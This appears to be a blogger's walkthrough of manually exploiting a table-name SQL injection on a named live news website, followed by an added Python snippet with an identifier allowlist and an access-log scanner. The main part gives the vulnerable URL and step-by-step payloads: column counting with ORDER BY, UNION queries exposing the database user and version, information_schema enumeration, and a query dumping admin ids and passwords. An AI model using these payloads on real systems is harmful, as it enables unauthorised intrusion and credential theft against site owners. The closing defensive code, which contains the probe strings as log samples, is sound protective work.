Numeric-type and character-type injection are the common ones, and search-type and cookie-type injection also come up. What about injecting through a table name? On one site the automated tool ("radish") couldn't recognise this point (or maybe I hadn't configured it well), but it really was an injection point, so I had to do it by hand.

Injection point (nothing to bypass):

http://www.bkjia.com/News/print_paper.php?number=150683&news_article=news_article

Adding a single quote produces a database error. The error reveals that this script runs at least two queries against the injected table name.

First SQL statement:

SELECT date FROM news_article WHERE date_order >= 668740920 ORDER BY date_order LIMIT 1

Second SQL statement:

SELECT * FROM news_article WHERE number = '2016'

Because a WHERE clause follows the table name in both statements, anything injected at the table-name position has to comment out the rest of the statement. I used ";--" for that.

Finding the column count with ORDER BY:

news_article ORDER BY 1;--   normal page
news_article ORDER BY 2;--   the first statement now errors. You know the reason: it only selects one column, "date". Based on my personal database-design experience that column is usually not of string type, which is not much use for further injection. (From here on I only talk about the second statement and ignore errors from the first.)
ORDER BY 20;--   normal
ORDER BY 50;--   error (second statement)
ORDER BY 40;--   normal
ORDER BY 45;--   error
ORDER BY 43;--   error
ORDER BY 42;--   normal

So the second query has 42 columns. Now UNION:

news_article WHERE 1=2 UNION SELECT 1,2,3,...,42;--

Comparing the result with the normal page shows which fields are displayed and of character type.

Getting the database version, user name and database name:

news_article WHERE 1=2 UNION SELECT 1,...,user(),...,database(),...,version(),...,42;--

Result: version 5.0.90-log; user upnews@61.97.139.36; database name upnews. MySQL 5, so information_schema is available.

Listing tables (0x75706e657773 is the hex encoding of upnews):

news_article WHERE 1=2 UNION SELECT 1,(SELECT group_concat(TABLE_NAME) FROM (SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema=0x75706e657773 LIMIT 0,10) AS t),...,(SELECT COUNT(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema=0x75706e657773),...,42;--

The first time I used group_concat() directly, the reported number of tables was wrong and the table names were truncated. That is why the statement above pages through them with a subquery and LIMIT, ten table names at a time.

Listing columns (the table name news_admin_member in hex):

news_article WHERE 1=2 UNION SELECT 1,(SELECT group_concat(column_name) FROM (SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME=<hex of news_admin_member> LIMIT 0,10) AS c),...,(SELECT COUNT(column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME=<hex of news_admin_member>),...,42;--

Reading values:

news_article WHERE 1=2 UNION SELECT 1,2,3,4,5,(SELECT group_concat(concat(id,0x7c,pass)) FROM news_admin_member),...,42;--

What's next? Whatever you want to do... Haha. As you can see, table-name injection is very similar to numeric injection, and in one way even better than the other types: everything after the table name is under your control.
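The root cause here is a table name taken straight from the query string and pasted into SQL. An identifier cannot be bound as a prepared-statement parameter, so the fix is an exact-match allowlist, and the same identifier rule gives a cheap access-log check for the ";--" and ORDER BY probes shown above. This is an added example, not code from the original post or the site; the allowlist, the parameter name news_article and the log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical allowlist: the only tables print_paper.php may ever query.
ALLOWED_TABLES = {"news_article", "news_notice"}
# A bare MySQL-style identifier: no quotes, spaces, ';' or '--' can match.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")

def resolve_table(param: str) -> str:
    """Return the table name to use in SQL, or raise if not allowlisted.
    Exact-match against a fixed set; never interpolate `param` itself."""
    if param not in ALLOWED_TABLES:
        raise ValueError(f"table not allowed: {param!r}")
    return param

def suspicious_identifier_params(log_line, ident_params=("news_article",)):
    """(param, decoded value) pairs from one access-log line where a parameter
    that should carry a bare identifier contains anything else."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP', log_line)
    if not m:
        return []
    qs = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    return [(name, v) for name in ident_params
            for v in qs.get(name, []) if not IDENT_RE.match(v)]

def scan_log(lines):
    """Return (line index, param, value) for every flagged request."""
    return [(i, p, v) for i, line in enumerate(lines)
            for p, v in suspicious_identifier_params(line)]

# Constructed log lines: a normal request, the single-quote probe,
# and an ORDER BY probe with ';' and ' ' percent-encoded (%3B, %20).
LOG = [
    '203.0.113.7 - - [01/Jan/2016:10:00:00 +0000] "GET /News/print_paper.php'
    '?number=150683&news_article=news_article HTTP/1.1" 200 5123',
    '203.0.113.7 - - [01/Jan/2016:10:00:05 +0000] "GET /News/print_paper.php'
    '?number=150683&news_article=news_article%27 HTTP/1.1" 500 412',
    '203.0.113.7 - - [01/Jan/2016:10:00:09 +0000] "GET /News/print_paper.php'
    '?number=150683&news_article=news_article%20order%20by%2042%3B-- HTTP/1.1" 200 5123',
]

if __name__ == "__main__":
    for idx, param, value in scan_log(LOG):   # flags lines 1 and 2
        print(f"line {idx}: {param}={value!r}")
```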